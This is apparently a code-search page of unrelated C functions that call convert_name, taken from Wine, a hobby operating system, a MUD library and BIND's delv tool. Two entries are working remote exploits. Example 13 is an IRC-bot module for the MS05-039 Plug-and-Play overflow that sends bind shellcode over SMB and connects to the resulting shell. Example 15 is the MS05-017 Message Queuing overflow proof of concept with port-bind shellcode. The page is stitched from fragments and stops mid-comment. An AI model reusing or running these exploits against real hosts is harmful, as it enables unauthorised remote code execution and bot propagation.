        put_dword( &dialog16, get_dword( &dialog32 ) );  /* helpID */
        put_dword( &dialog16, get_dword( &dialog32 ) );  /* exStyle */
        style = get_dword( &dialog32 );
        put_dword( &dialog16, style );                   /* style */
    }
    else
        dialog32 = (DWORD *)dialog32 + 1; /* exStyle ignored in 16-bit standard dialog */

    /* The 16-bit header keeps the item count in one byte (put_byte), so a
     * count above 255 is narrowed here while the loop below still uses the
     * full WORD value. */
    nbItems = get_word( &dialog32 );
    put_byte( &dialog16, nbItems );
    put_word( &dialog16, get_word( &dialog32 ) ); /* x */
    put_word( &dialog16, get_word( &dialog32 ) ); /* y */
    put_word( &dialog16, get_word( &dialog32 ) ); /* cx */
    put_word( &dialog16, get_word( &dialog32 ) ); /* cy */

    /* Transfer menu name */
    convert_name( &dialog16, &dialog32 );

    /* Transfer class name */
    convert_name( &dialog16, &dialog32 );

    /* Transfer window caption: converted in place with no output bound,
     * then both pointers are stepped past the NUL-terminated strings. */
    WideCharToMultiByte( CP_ACP, 0, dialog32, -1, dialog16, 0x7fffffff, NULL, NULL );
    dialog16 = (LPSTR)dialog16 + strlen( (LPSTR)dialog16 ) + 1;
    dialog32 = (LPWSTR)dialog32 + strlenW( (LPWSTR)dialog32 ) + 1;

    /* Transfer font info (only present when DS_SETFONT is in the style) */
    if (style & DS_SETFONT)
    {
        put_word( &dialog16, get_word( &dialog32 ) );  /* pointSize */
        if (dialogEx)
        {
            put_word( &dialog16, get_word( &dialog32 ) ); /* weight */
            put_word( &dialog16, get_word( &dialog32 ) ); /* italic */
        }
        WideCharToMultiByte( CP_ACP, 0, (LPWSTR)dialog32, -1, (LPSTR)dialog16, 0x7fffffff, NULL, NULL );  /* faceName */
        dialog16 = (LPSTR)dialog16 + strlen( (LPSTR)dialog16 ) + 1;
        dialog32 = (LPWSTR)dialog32 + strlenW( (LPWSTR)dialog32 ) + 1;
    }

    /* Transfer dialog items */
    while (nbItems)
    {
        /* align on DWORD boundary (32-bit only) */
        dialog32 = (LPVOID)(((UINT_PTR)dialog32 + 3) & ~3);

        if (dialogEx)
        {
            put_dword( &dialog16, get_dword( &dialog32 ) ); /* helpID */
            put_dword( &dialog16, get_dword( &dialog32 ) ); /* exStyle */
            put_dword( &dialog16, get_dword( &dialog32 ) ); /* style */
        }
        else
        {
            /* In the standard layout the item style precedes the position
             * words but is written after the ID in 16-bit form, hence the
             * save. */
            style = get_dword( &dialog32 );    /* save style */
            dialog32 = (DWORD *)dialog32 + 1;  /* ignore exStyle */
        }

        put_word( &dialog16, get_word( &dialog32 ) ); /* x */
        put_word( &dialog16, get_word( &dialog32 ) ); /* y */
        put_word( &dialog16, get_word( &dialog32 ) ); /* cx */
        put_word( &dialog16, get_word( &dialog32 ) ); /* cy */

        if (dialogEx)
            put_dword( &dialog16, get_dword( &dialog32 ) ); /* ID */
        else
        {
            put_word( &dialog16, get_word( &dialog32 ) ); /* ID */
            put_dword( &dialog16, style );  /* style from above */
        }

        /* Transfer class name: 0x0000 = none, 0xffff = marker followed by a
         * WORD ordinal (emitted as one byte), anything else = string. */
        switch (*(WORD *)dialog32)
        {
        case 0x0000:
            get_word( &dialog32 );
            put_byte( &dialog16, 0 );
            break;
        case 0xffff:
            get_word( &dialog32 );
            put_byte( &dialog16, get_word( &dialog32 ) );
            break;
        default:
            WideCharToMultiByte( CP_ACP, 0, (LPWSTR)dialog32, -1, (LPSTR)dialog16, 0x7fffffff, NULL, NULL );
            dialog16 = (LPSTR)dialog16 + strlen( (LPSTR)dialog16 ) + 1;
            dialog32 = (LPWSTR)dialog32 + strlenW( (LPWSTR)dialog32 ) + 1;
            break;
        }

        /* Transfer window name */
        convert_name( &dialog16, &dialog32 );

        /* Transfer data: a length word taken from the template, written as
         * a WORD (DIALOGEX) or a byte (standard, so lengths above 255 are
         * narrowed), followed by that many bytes copied verbatim. */
        data = get_word( &dialog32 );
        if (dialogEx)
            put_word(&dialog16, data);
        else
            put_byte(&dialog16,(BYTE)data);

        if (data)
        {
            memcpy( dialog16, dialog32, data );
            dialog16 = (BYTE *)dialog16 + data;
            dialog32 = (BYTE *)dialog32 + data;
        }

        /* Next item */
        nbItems--;
    }
}
Exemplo n.º 12
int syscall_stat(const char *file_name, struct stat *buf)
{
	int drive;
	int curdir_handle;
	char name_comp[13], conv_name[11], dir_path[501];
	struct dir_entry dent;
	int err, count;
	struct date_time dt;
	int clno;

	if (strlen(file_name) > 500) return ELONGPATH;

	parse_path(file_name, &drive, dir_path, name_comp);

	if (dir_path[0] != 0)
	{
		curdir_handle = open_path(drive, dir_path);

		if (curdir_handle < 0)
		{
			return curdir_handle;	// Error
		}
	}
	else
	{
		curdir_handle = get_curdir_handle(drive);
		increment_ref_count(curdir_handle);
	}

	// Last file name component.
	if (convert_name(name_comp, conv_name) < 0)
	{
		err =  EINVALIDNAME; // Error
	}
	else if (find_entry(curdir_handle, conv_name, &dent) == 1)
	{
		// Fill up the stat buf
		buf->st_dev = drive;
		buf->st_ino = 0;
		buf->st_mode = dent.attrib;
		buf->st_nlink = 1;
		buf->st_uid = buf->st_gid = 0;
		buf->st_rdev = 0;
		buf->st_size = dent.fsize;
		buf->st_blksize = 512;
		// Find time in seconds
		dt.seconds = (dent.time & 0x1f) * 2;
		dt.minutes = ((dent.time & 0x7e0) >> 5);
		dt.hours = (((unsigned short int)(dent.time & 0xf800)) >> 11);
		dt.date = dent.date & 0x1f;
		dt.month = ((dent.date & 0x1e0) >> 5);
		dt.year = (((unsigned short int)(dent.date & 0xfe00)) >> 9);

		buf->st_atime = buf->st_mtime = buf->st_ctime = date_to_secs(dt);

		// Find number of blocks
		count = 0;
		clno = dent.start_cluster;
		while (clno < 0xff8)
		{
			count++;
			clno = next_cluster_12(clno);
		}
		buf->st_blocks = count;
		err = 0;
	}
Exemplo n.º 13
BOOL pnp(EXINFO exinfo)
{
	struct sockaddr_in addr;
	struct hostent *he;
	int len;
	int sockfd;
	unsigned short smblen;
	unsigned short bindport;
	unsigned char tmp[1024];
	unsigned char packet[4096];
	unsigned char *ptr;
	char recvbuf[4096];
    char buffer[IRCLINE];

#ifdef _WIN32
	WSADATA wsa;
	WSAStartup(MAKEWORD(2,0), &wsa);
#endif

//	printf("\n      (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow\n");
//	printf("\t         Universal Exploit + no crash shellcode\n\n\n");
//	printf("\t            Copyright (c) 2005 .: houseofdabus :.\n\n\n");


//	if (exinfo.ip < 3) {
	//	printf("%s <host> <bind port>\n", argv[0]);
	//	exit(0);
// return false;
//	}

	if ((he = gethostbyname(exinfo.ip)) == NULL) {
	//	printf("[-] Unable to resolve %s\n", argv[1]);
	//	exit(0);
      return false;
	}

	if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
	//	printf("[-] socket failed\n");
	//	exit(0);

	}

	addr.sin_family = AF_INET;
	addr.sin_port = htons(445);
	addr.sin_addr = *((struct in_addr *)he->h_addr);
	memset(&(addr.sin_zero), '\0', 8);



	//printf("\n[*] connecting to %s:445...", argv[1]);
	if (connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) {
		//printf("\n[-] connect failed\n");
		//exit(0);
      return false;
	}
//	printf("ok\n");

//	printf("[*] null session...");
	if (send(sockfd, SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0) < 0) {
	//	printf("\n[-] send failed\n");
	//	exit(0);
 return false;
	}

	len = recv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) {
	//	printf("\n[-] failed\n");
	//	exit(0);
   return false;
	}

	if (send(sockfd, SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX)-1, 0) < 0) {
	//	printf("\n[-] send failed\n");
	//	exit(0);
    return false;
	}

	len = recv(sockfd, recvbuf, 4096, 0);
	if (len <= 10) {
	//	printf("\n[-] failed\n");
	//	exit(0);
    return false;
	}

	if (send(sockfd, SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2)-1, 0) < 0) {
	//	printf("\n[-] send failed\n");
	//	exit(0);
    return false;
	}

	len = recv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) {
		//printf("\n[-] failed\n");
	//	exit(0);
    return false;
	}

	ptr = packet;
	memcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX)-1);
	ptr += sizeof(SMB_TreeConnectAndX)-1;

    sprintf((char*)tmp,"\\\\%s\\IPC$",exinfo.ip);
	convert_name((char*)ptr, (char*)tmp);
	smblen = strlen((char*)tmp)*2;
	ptr += smblen;
	smblen += 9;
	memcpy(packet + sizeof(SMB_TreeConnectAndX)-1-3, &smblen, 1);

	memcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_)-1);
	ptr += sizeof(SMB_TreeConnectAndX_)-1;

	smblen = ptr-packet;
	smblen -= 4;
	memcpy(packet+3, &smblen, 1);

	if (send(sockfd, (char*)packet, ptr-packet, 0) < 0) {

	//	printf("\n[-] send failed\n");
  // _snprintf(buffer, sizeof(buffer), "send failed");
  //  irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
	return false;
	}

	len = recv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) {
	//	printf("\n[-] failed\n");
     //_snprintf(buffer, sizeof(buffer), "failed");
   // irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
	//	exit(0);
return false;
	}

	//printf("ok\n");
//	printf("[*] bind pipe...");

   // _snprintf(buffer, sizeof(buffer), "Bind Pipe");
   //irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);

	if (send(sockfd, SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser)-1, 0) < 0) {
		//printf("\n[-] send failed\n");


		return false;
	}

	len = recv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) {
	//	printf("\n[-] failed\n");
	//	exit(0);


	}

	if (send(sockfd, SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint)-1, 0) < 0) {
	//	printf("\n[-] send failed\n");
	//_snprintf(buffer, sizeof(buffer), "send failed");
    //irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
		//exit(0);
     return false;
	}

	len = recv(sockfd, recvbuf, 4096, 0);
	if ((len <= 10) || (recvbuf[9] != 0)) {
	//	printf("\n[-] failed\n");
	//	exit(0);
      return false;
	}

	//printf("ok\n");
//	printf("[*] sending crafted packet...");

   // _snprintf(buffer, sizeof(buffer), "sending craffted packet");
 //   irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);

	// nop
	ptr = packet;
	memset(packet, '\x90', sizeof(packet));

	// header & offsets
	memcpy(ptr, RPC_call, sizeof(RPC_call)-1);
	ptr += sizeof(RPC_call)-1;

	// shellcode
	bindport = xport;
	bindport ^= 0x0437;
	SET_PORTBIND_PORT(bind_shellcode, htons(bindport));
	memcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1);

	// end of packet
	memcpy( packet + 2196 - sizeof(RPC_call_end)-1 + 2,
		RPC_call_end,
		sizeof(RPC_call_end)-1);

	// sending...
	if (send(sockfd, (char*)packet, 2196, 0) < 0) {
	//	printf("\n[-] send failed\n");
    //_snprintf(buffer, sizeof(buffer), "send failed");
    //irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
		//exit(0);
		return false;
	}
//	printf("ok\n");
//	printf("[*] check your shell on %s:%i\n", argv[1], atoi(argv[2]));

//    _snprintf(buffer, sizeof(buffer), "Exploiting IP:%s",exinfo.ip);
    irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
   // recv(sockfd, recvbuf, 4096, 0);
	exploit[exinfo.exploit].stats++;
	if (ConnectShell2(exinfo))
		return true;
        return false;
}
Exemplo n.º 14
Arquivo: files.c Projeto: Elohim/FGmud
/* Resolve the save-file path for a player name.
 * Argument 1 must be a string; it is normalised with convert_name() and
 * the lookup itself is delegated to the master object.
 * NOTE(review): the error text names save_file(), not this function. */
string player_save_file(string who){
    if( !stringp(who) ) error("Bad argument 1 to save_file().");
    return master()->player_save_file(convert_name(who));
}
Exemplo n.º 15
/*
 * Proof-of-concept for MS05-017 (Message Queuing buffer overflow),
 * ".: houseofdabus :." 2004-2005.  Historical exploit code kept for
 * reference only; the issue was patched by Microsoft in 2005.
 *
 * usage: <host> <port> <netbios name> <bind port> [count]
 * Resolves <host>, connects to the MSMQ RPC <port>, sends a DCE-RPC bind
 * for the interface UUID in 'endp', reads one reply, then sends 'count'
 * copies of a 4172-byte request: NOP-filled, headers at fixed offsets,
 * the NetBIOS name widened after dce_rpc_header1, 'offsets' at +438 and a
 * port-bind shellcode right after them.  Always returns 0.
 *
 * NOTE(review): malloc(4172) is unchecked, argv[2]/argv[4]/argv[5] go
 * through atoi() with no validation, and neither 'buff' nor 'sockfd' is
 * released (the process exits right after).
 */
int
main (int argc, char **argv)
{

	/* MSMQ RPC interface UUID handed to dce_rpc_bind() below. */
	unsigned char endp[] = "fdb3a030-065f-11d1-bb9b-00a024ea5525";
	unsigned char *packet = NULL;
	unsigned short bindport;
	unsigned long cnt;
	struct sockaddr_in addr;
	struct hostent *he;
	/* cpkt: number of crafted packets to send; optional argv[5] overrides. */
	int len, cpkt = 1;
	int sockfd;
	char recvbuf[4096];
	char *buff, *ptr;
#ifdef _WIN32  
	WSADATA wsa;  
#endif  


	printf("\n      (MS05-017) Message Queuing Buffer Overflow Vulnerability\n\n");
	printf("\t     Copyright (c) 2004-2005 .: houseofdabus :.\n\n\n");


	/* Four positional arguments are mandatory, the fifth (count) optional. */
	if (argc < 5) {
		printf("%s <host> <port> <netbios name> <bind port> [count]\n", argv[0]);
		printf("\nMSMQ ports: 2103, 2105, 2107\n");
		printf("count - number of packets. for Win2k Server/AdvServer = 6-8\n\n");
		exit(0);
	}

#ifdef _WIN32  
	WSAStartup(MAKEWORD(2,0), &wsa);  
#endif  

	if ((he = gethostbyname(argv[1])) == NULL) {
		printf("[-] Unable to resolve %s\n", argv[1]);
		return 0;
	}

	if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
		printf("[-] create socket failed\n");
		exit(0);
	}

	addr.sin_family = AF_INET;
	/* NOTE(review): atoi() yields 0 for non-numeric input; no range check. */
	addr.sin_port = htons((short)atoi(argv[2]));
	addr.sin_addr = *((struct in_addr *)he->h_addr);  
	memset(&(addr.sin_zero), '\0', 8);

	printf("\n[*] Connecting to %s:%u ... ", argv[1], atoi(argv[2]));
	if (connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) {
		printf("\n[-] connect failed!\n");
		exit(0);
	}
	printf("OK\n");

	/* DCE-RPC bind to the MSMQ interface; dce_rpc_bind() allocates 'packet'
	 * and reports its length through 'cnt'. */
	packet = dce_rpc_bind(0, endp, 1, &cnt);

	if (send(sockfd, packet, cnt, 0) == -1) {
		printf("[-] send failed\n");
		exit(0);
	}

	/* The bind-ack is consumed but never inspected. */
	len = recv(sockfd, recvbuf, 4096, 0);
	if (len <= 0) {
		printf("[-] recv failed\n");
		exit(0);
	}
	free(packet);

	printf("[*] Attacking...");

	/* NOTE(review): unchecked allocation; the memset below would fault on NULL. */
	buff = (char *) malloc(4172);
	memset(buff, NOP, 4172);

	ptr = buff;
	memcpy(ptr, dce_rpc_header1, sizeof(dce_rpc_header1)-1);
	ptr += sizeof(dce_rpc_header1)-1;

	// Remote NetBIOS name
	/* convert_name() presumably widens the name (the pointer advances by
	 * strlen*2).  NOTE(review): nothing bounds argv[3] against the 438-byte
	 * window that 'offsets' is written into below. */
	convert_name(ptr, argv[3]);
	ptr += strlen(argv[3])*2;

	memcpy(ptr, tag_private, sizeof(tag_private)-1);
	ptr += sizeof(tag_private)-1;

	/* Repeated header fragments at fixed 1048-byte strides. */
	memcpy(buff+1048,   dce_rpc_header2, sizeof(dce_rpc_header2)-1);
	memcpy(buff+1048*2, dce_rpc_header2, sizeof(dce_rpc_header2)-1);
	memcpy(buff+1048*3, dce_rpc_header3, sizeof(dce_rpc_header3)-1);

	// offsets
	ptr = buff;
	ptr += 438;
	memcpy(ptr, offsets, sizeof(offsets)-1);
	ptr += sizeof(offsets)-1;

	// shellcode
	/* The bind port is stored XOR 0x0437; the shellcode undoes that at run time. */
	bindport = (unsigned short)atoi(argv[4]);
	bindport ^= 0x0437;
	SET_PORTBIND_PORT(bind_shellcode, htons(bindport));
	memcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1);

	/* Terminate the NOP-filled buffer with two zero bytes. */
	buff[4170] = '\0';
	buff[4171] = '\0';

	if (argc == 6) cpkt = atoi(argv[5]);

	/* Several copies are needed on some targets (see usage text). */
	while (cpkt--) {
		printf(".");
		if (send(sockfd, buff, 4172, 0) == -1) {
			printf("\n[-] send failed\n");
			exit(0);
		}
	}
	printf(" OK\n");


return 0;
}
Exemplo n.º 16
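/*
 * Load the DNSSEC trust anchors the validator will use.
 *
 * Keys come from 'anchorfile' if one was given on the command line,
 * otherwise from the system bind.keys (NS_SYSCONFDIR/bind.keys, or
 * <sysconfdir>\bind.keys on Windows); if no file could be read or parsed
 * the compiled-in 'anchortext' is used instead.  Which keys are actually
 * installed is decided per entry by load_keys()/key_fromconfig().
 *
 * Aborts via fatal() when an explicitly named anchor file is unusable or
 * when no key at all was installed.  Returns ISC_R_SUCCESS, or the
 * failing isc_result_t after logging it.
 */
static isc_result_t
setup_dnsseckeys(dns_client_t *client) {
	isc_result_t result;
	cfg_parser_t *parser = NULL;
	const cfg_obj_t *keys = NULL;
	const cfg_obj_t *managed_keys = NULL;
	cfg_obj_t *bindkeys = NULL;
	const char *filename = anchorfile;

	/* Nothing to do unless some form of validation was requested. */
	if (!root_validation && !dlv_validation)
		return (ISC_R_SUCCESS);

	if (filename == NULL) {
#ifndef WIN32
		filename = NS_SYSCONFDIR "/bind.keys";
#else
		static char buf[MAX_PATH];
		strlcpy(buf, isc_ntpaths_get(SYS_CONF_DIR), sizeof(buf));
		strlcat(buf, "\\bind.keys", sizeof(buf));
		filename = buf;
#endif
	}

	/* The root zone is the default trust anchor. */
	if (trust_anchor == NULL) {
		trust_anchor = isc_mem_strdup(mctx, ".");
		if (trust_anchor == NULL)
			fatal("out of memory");
	}

	/* trust_anchor is guaranteed non-NULL here; dlv_anchor is optional. */
	CHECK(convert_name(&afn, &anchor_name, trust_anchor));
	if (dlv_anchor != NULL)
		CHECK(convert_name(&dfn, &dlv_name, dlv_anchor));

	CHECK(cfg_parser_create(mctx, dns_lctx, &parser));

	if (access(filename, R_OK) != 0) {
		/* Only fatal when the user named the file explicitly; the
		 * default location may simply not exist. */
		if (anchorfile != NULL)
			fatal("Unable to read key file '%s'", anchorfile);
	} else {
		result = cfg_parse_file(parser, filename,
					&cfg_type_bindkeys, &bindkeys);
		if (result != ISC_R_SUCCESS && anchorfile != NULL)
			fatal("Unable to load keys from '%s'", anchorfile);
	}

	/* Fall back to the anchors compiled into the binary. */
	if (bindkeys == NULL) {
		isc_buffer_t b;

		isc_buffer_init(&b, anchortext, sizeof(anchortext) - 1);
		isc_buffer_add(&b, sizeof(anchortext) - 1);
		result = cfg_parse_buffer(parser, &b, &cfg_type_bindkeys,
					  &bindkeys);
		if (result != ISC_R_SUCCESS)
			fatal("Unable to parse built-in keys");
	}

	INSIST(bindkeys != NULL);
	cfg_map_get(bindkeys, "trusted-keys", &keys);
	cfg_map_get(bindkeys, "managed-keys", &managed_keys);

	if (keys != NULL)
		CHECK(load_keys(keys, client));
	if (managed_keys != NULL)
		CHECK(load_keys(managed_keys, client));
	result = ISC_R_SUCCESS;

	/* Validating with no anchor at all would fail every answer; stop here. */
	if (trusted_keys == 0)
		fatal("No trusted keys were loaded");

	if (dlv_validation)
		dns_client_setdlv(client, dns_rdataclass_in, dlv_anchor);

 cleanup:
	/* The key rdata has been copied into the client by now, so the parsed
	 * config tree and the parser can be released on every exit path
	 * (they were previously leaked). */
	if (bindkeys != NULL)
		cfg_obj_destroy(parser, &bindkeys);
	if (parser != NULL)
		cfg_parser_destroy(&parser);
	if (result != ISC_R_SUCCESS)
		delv_log(ISC_LOG_ERROR, "setup_dnsseckeys: %s",
			  isc_result_totext(result));
	return (result);
}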
Exemplo n.º 17
/*
 * Install one trusted-keys / managed-keys entry from the parsed bind.keys
 * configuration as a trust anchor on 'client'.
 *
 * Only a key whose owner name equals the configured root anchor
 * (anchor_name) or DLV anchor (dlv_name) is used, and only when the
 * matching validation mode is enabled; any other entry is skipped with
 * ISC_R_SUCCESS.  The DNSKEY rdata is rebuilt from the flags / protocol /
 * algorithm / base64 key tuple and handed to dns_client_addtrustedkey();
 * the file-scope counter 'trusted_keys' is bumped on success.
 *
 * Returns ISC_R_SUCCESS (also for skipped keys and for keys whose
 * algorithm is unsupported, which are logged and dropped), DST_R_NOCRYPTO
 * when crypto support is missing, or ISC_R_FAILURE for any other error
 * (the underlying result is logged, not returned).
 */
static isc_result_t
key_fromconfig(const cfg_obj_t *key, dns_client_t *client) {
	dns_rdata_dnskey_t keystruct;
	isc_uint32_t flags, proto, alg;
	const char *keystr, *keynamestr;
	unsigned char keydata[4096];
	isc_buffer_t keydatabuf;
	unsigned char rrdata[4096];
	isc_buffer_t rrdatabuf;
	isc_region_t r;
	dns_fixedname_t fkeyname;
	dns_name_t *keyname;
	isc_result_t result;
	isc_boolean_t match_root = ISC_FALSE, match_dlv = ISC_FALSE;

	/* Parse the owner name first; a bad name is reported via cleanup
	 * even when no validation mode is enabled. */
	keynamestr = cfg_obj_asstring(cfg_tuple_get(key, "name"));
	CHECK(convert_name(&fkeyname, &keyname, keynamestr));

	if (!root_validation && !dlv_validation)
		return (ISC_R_SUCCESS);

	if (anchor_name)
		match_root = dns_name_equal(keyname, anchor_name);
	if (dlv_name)
		match_dlv = dns_name_equal(keyname, dlv_name);

	/* Ignore keys for names we are not anchoring, and keys for a mode
	 * that is switched off. */
	if (!match_root && !match_dlv)
		return (ISC_R_SUCCESS);
	if ((!root_validation && match_root) || (!dlv_validation && match_dlv))
		return (ISC_R_SUCCESS);

	if (match_root)
		delv_log(ISC_LOG_DEBUG(3), "adding trust anchor %s",
			  trust_anchor);
	if (match_dlv)
		delv_log(ISC_LOG_DEBUG(3), "adding DLV trust anchor %s",
			  dlv_anchor);

	flags = cfg_obj_asuint32(cfg_tuple_get(key, "flags"));
	proto = cfg_obj_asuint32(cfg_tuple_get(key, "protocol"));
	alg = cfg_obj_asuint32(cfg_tuple_get(key, "algorithm"));

	keystruct.common.rdclass = dns_rdataclass_in;
	keystruct.common.rdtype = dns_rdatatype_dnskey;
	/*
	 * The key data in keystruct is not dynamically allocated.
	 */
	keystruct.mctx = NULL;

	ISC_LINK_INIT(&keystruct.common, link);

	/* The config parser accepts 32-bit values; the wire fields are
	 * 16/8/8 bits, so reject anything that would be truncated. */
	if (flags > 0xffff)
		CHECK(ISC_R_RANGE);
	if (proto > 0xff)
		CHECK(ISC_R_RANGE);
	if (alg > 0xff)
		CHECK(ISC_R_RANGE);

	keystruct.flags = (isc_uint16_t)flags;
	keystruct.protocol = (isc_uint8_t)proto;
	keystruct.algorithm = (isc_uint8_t)alg;

	isc_buffer_init(&keydatabuf, keydata, sizeof(keydata));
	isc_buffer_init(&rrdatabuf, rrdata, sizeof(rrdata));

	/* Base64 key material goes into keydata (bounded by the 4096-byte
	 * buffer; the decoder fails rather than overflows). */
	keystr = cfg_obj_asstring(cfg_tuple_get(key, "key"));
	CHECK(isc_base64_decodestring(keystr, &keydatabuf));
	isc_buffer_usedregion(&keydatabuf, &r);
	keystruct.datalen = r.length;
	keystruct.data = r.base;

	/* Serialise the struct to DNSKEY wire format in rrdatabuf. */
	CHECK(dns_rdata_fromstruct(NULL,
				   keystruct.common.rdclass,
				   keystruct.common.rdtype,
				   &keystruct, &rrdatabuf));

	CHECK(dns_client_addtrustedkey(client, dns_rdataclass_in,
				       keyname, &rrdatabuf));
	trusted_keys++;

 cleanup:
	/* Map the specific failure onto what the caller sees: NOCRYPTO is
	 * passed through, an unsupported algorithm is downgraded to a
	 * warning and success, everything else becomes ISC_R_FAILURE. */
	if (result == DST_R_NOCRYPTO)
		cfg_obj_log(key, lctx, ISC_LOG_ERROR, "no crypto support");
	else if (result == DST_R_UNSUPPORTEDALG) {
		cfg_obj_log(key, lctx, ISC_LOG_WARNING,
			    "skipping trusted key '%s': %s",
			    keynamestr, isc_result_totext(result));
		result = ISC_R_SUCCESS;
	} else if (result != ISC_R_SUCCESS) {
		cfg_obj_log(key, lctx, ISC_LOG_ERROR,
			    "failed to add trusted key '%s': %s",
			    keynamestr, isc_result_totext(result));
		result = ISC_R_FAILURE;
	}

	return (result);
}
Exemplo n.º 18
/*
 * Entry point of delv, a DNSSEC-validating lookup tool built on the
 * libdns dns_client API.
 *
 * Initialisation order matters: preparse_args() runs before the
 * libraries are initialised, parse_args() only after the app/task/
 * socket/timer contexts exist, and setup_dnsseckeys() after the client
 * and its nameserver have been configured.  Every resource is released
 * at 'cleanup', which is reached both on success and on CHECK() failure.
 *
 * Always exits with status 0; resolution and printing errors are only
 * logged.
 */
int
main(int argc, char *argv[]) {
	dns_client_t *client = NULL;
	isc_result_t result;
	dns_fixedname_t qfn;
	dns_name_t *query_name, *response_name;
	dns_rdataset_t *rdataset;
	dns_namelist_t namelist;
	unsigned int resopt, clopt;
	isc_appctx_t *actx = NULL;
	isc_taskmgr_t *taskmgr = NULL;
	isc_socketmgr_t *socketmgr = NULL;
	isc_timermgr_t *timermgr = NULL;
	dns_master_style_t *style = NULL;
#ifndef WIN32
	struct sigaction sa;
#endif

	progname = argv[0];
	preparse_args(argc, argv);

	argc--;
	argv++;

	isc_lib_register();
	result = dns_lib_init();
	if (result != ISC_R_SUCCESS)
		fatal("dns_lib_init failed: %d", result);

	result = isc_mem_create(0, 0, &mctx);
	if (result != ISC_R_SUCCESS)
		fatal("failed to create mctx");

	/* A single task is enough for one synchronous lookup. */
	CHECK(isc_appctx_create(mctx, &actx));
	CHECK(isc_taskmgr_createinctx(mctx, actx, 1, 0, &taskmgr));
	CHECK(isc_socketmgr_createinctx(mctx, actx, &socketmgr));
	CHECK(isc_timermgr_createinctx(mctx, actx, &timermgr));

	parse_args(argc, argv);

	CHECK(setup_style(&style));

	setup_logging(stderr);

	CHECK(isc_app_ctxstart(actx));

#ifndef WIN32
	/* Unblock SIGINT if it's been blocked by isc_app_ctxstart() */
	memset(&sa, 0, sizeof(sa));
	sa.sa_handler = SIG_DFL;
	if (sigfillset(&sa.sa_mask) != 0 || sigaction(SIGINT, &sa, NULL) < 0)
		fatal("Couldn't set up signal handler");
#endif

	/* Create client */
	clopt = DNS_CLIENTCREATEOPT_USECACHE;
	result = dns_client_createx2(mctx, actx, taskmgr, socketmgr, timermgr,
				     clopt, &client, srcaddr4, srcaddr6);
	if (result != ISC_R_SUCCESS) {
		delv_log(ISC_LOG_ERROR, "dns_client_create: %s",
			  isc_result_totext(result));
		goto cleanup;
	}

	/* Set the nameserver */
	/* An explicit -@ server wins; otherwise one is discovered. */
	if (server != NULL)
		addserver(client);
	else
		findserver(client);

	/* Trust anchors must be in place before the first resolve. */
	CHECK(setup_dnsseckeys(client));

	/* Construct QNAME */
	CHECK(convert_name(&qfn, &query_name, qname));

	/* Set up resolution options */
	/* CD is cleared by default so the upstream resolver validates too;
	 * +cd re-enables it, +novalidate/-i turn local validation off. */
	resopt = DNS_CLIENTRESOPT_ALLOWRUN | DNS_CLIENTRESOPT_NOCDFLAG;
	if (no_sigs)
		resopt |= DNS_CLIENTRESOPT_NODNSSEC;
	if (!root_validation && !dlv_validation)
		resopt |= DNS_CLIENTRESOPT_NOVALIDATE;
	if (cdflag)
		resopt &= ~DNS_CLIENTRESOPT_NOCDFLAG;

	/* Perform resolution */
	ISC_LIST_INIT(namelist);
	result = dns_client_resolve(client, query_name, dns_rdataclass_in,
				    qtype, resopt, &namelist);
	if (result != ISC_R_SUCCESS)
		delv_log(ISC_LOG_ERROR, "resolution failed: %s",
			  isc_result_totext(result));

	/* Whatever was returned (possibly partial) is printed, one rdataset
	 * at a time, in the configured master-file style. */
	for (response_name = ISC_LIST_HEAD(namelist);
	     response_name != NULL;
	     response_name = ISC_LIST_NEXT(response_name, link)) {
		for (rdataset = ISC_LIST_HEAD(response_name->list);
		     rdataset != NULL;
		     rdataset = ISC_LIST_NEXT(rdataset, link)) {
			result = printdata(rdataset, response_name, style);
			if (result != ISC_R_SUCCESS)
				delv_log(ISC_LOG_ERROR, "print data failed");
		}
	}

	dns_client_freeresanswer(client, &namelist);

cleanup:
	/* Tear down in reverse order of creation; each pointer is NULL if
	 * its stage was never reached. */
	if (dlv_anchor != NULL)
		isc_mem_free(mctx, dlv_anchor);
	if (trust_anchor != NULL)
		isc_mem_free(mctx, trust_anchor);
	if (anchorfile != NULL)
		isc_mem_free(mctx, anchorfile);
	if (qname != NULL)
		isc_mem_free(mctx, qname);
	if (style != NULL)
		dns_master_styledestroy(&style, mctx);
	if (client != NULL)
		dns_client_destroy(&client);
	if (taskmgr != NULL)
		isc_taskmgr_destroy(&taskmgr);
	if (timermgr != NULL)
		isc_timermgr_destroy(&timermgr);
	if (socketmgr != NULL)
		isc_socketmgr_destroy(&socketmgr);
	if (actx != NULL)
		isc_appctx_destroy(&actx);
	if (lctx != NULL)
		isc_log_destroy(&lctx);
	isc_mem_detach(&mctx);

	dns_lib_shutdown();

	return (0);
}
Exemplo n.º 19
/*
 * MS05-039 (Plug and Play over SMB) exploit module of an IRC bot.
 * Historical malicious code kept for reference only; the vulnerability
 * was patched by Microsoft in 2005.
 *
